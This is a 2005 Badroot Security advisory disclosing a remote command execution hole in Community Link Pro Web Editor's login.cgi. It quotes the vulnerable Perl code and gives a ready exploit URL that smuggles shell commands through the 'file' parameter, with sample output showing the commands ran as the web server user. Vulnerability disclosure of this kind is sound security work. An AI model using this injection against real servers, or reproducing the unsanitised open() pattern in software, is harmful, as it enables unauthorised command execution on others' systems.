[badroot security] Community link pro web editor: Remote command Execution
- - - - - - - - - - - - - - - - - - - - - - - - -
BADROOT SECURITY GROUP
Security Advisory 2005-#0x05
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
- - - - - - - - - - - - - - - - - - - - - - - - -
Authors ....... spher3 (spher3 at fatalimpulse dot net)
mozako (admin at fatalimpulse dot net)
Date ............. 29-06-2005
Product ....... Community Link Pro Web Editor (login.cgi)
Type ............ Remote Command Execution
o Description:
============================
Login.cgi is a login script written in perl by Community Link Pro Web Editor
that allows to a remote user to login in his own personal page.
o Vulnerable Code:
============================
[...]
open(FILE2,"$memberspath/$FORM{'username'}/$FORM{'file'}");
foreach (<FILE2>) {
print;
}
close(FILE2);
[...]
In this code there isn't a control in cgi query and exactly in $FORM{'file'}.
Without a control you can run system command remotely (Remote
Command Execution Vulnerability) with a string
like login.cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.
Example:
http://www.hostvuln.net/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname
-a; id|
Linux host.vuln.net 2.6.10-3mdk #1 Tue Feb 22 01:32:42 CET 2005 i686 unknown
unknown GNU/Linux
uid=72(apache) gid=72(apache) groups=72(apache)
o Proof of concept:
============================
You can download a simple PoC Exploit from:
http://www.badroot.org/exploits/clogin.pl
Original ADV:
http://www.badroot.org/advisories/SA0x05